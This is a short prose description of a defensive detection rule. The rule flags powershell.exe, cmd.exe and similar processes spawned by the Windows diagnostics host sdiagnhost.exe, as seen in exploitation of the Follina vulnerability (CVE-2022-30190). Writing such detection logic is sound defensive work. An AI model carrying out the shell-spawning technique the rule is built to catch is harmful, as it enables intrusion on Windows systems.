This rule is designed to detect suspicious child processes initiated by `sdiagnhost.exe`, a system process related to Microsoft Windows diagnostics. The detection focuses on identifying if this parent process is spawning known potentially malicious child processes, such as `powershell.exe`, `cmd.exe`, and others. The exploitation of the Follina vulnerability (CVE-2022-30190) serves as a primary context for concern, where attackers can exploit Microsoft Office documents to execute arbitrary commands via `sdiagnhost.exe`. The detection strategy involves a selection criteria that looks for `sdiagnhost.exe` as the parent process and matches the child process against a predefined list of suspicious applications typically used in attacks. It includes filters to mitigate false positives from legitimate usage scenarios involving `cmd.exe` and `powershell.exe`. By closely monitoring process creation events related to `sdiagnhost.exe` and its child processes, defenders can increase their chances of detecting exploitation attempts in real-time, thus enhancing the security posture of Windows environments.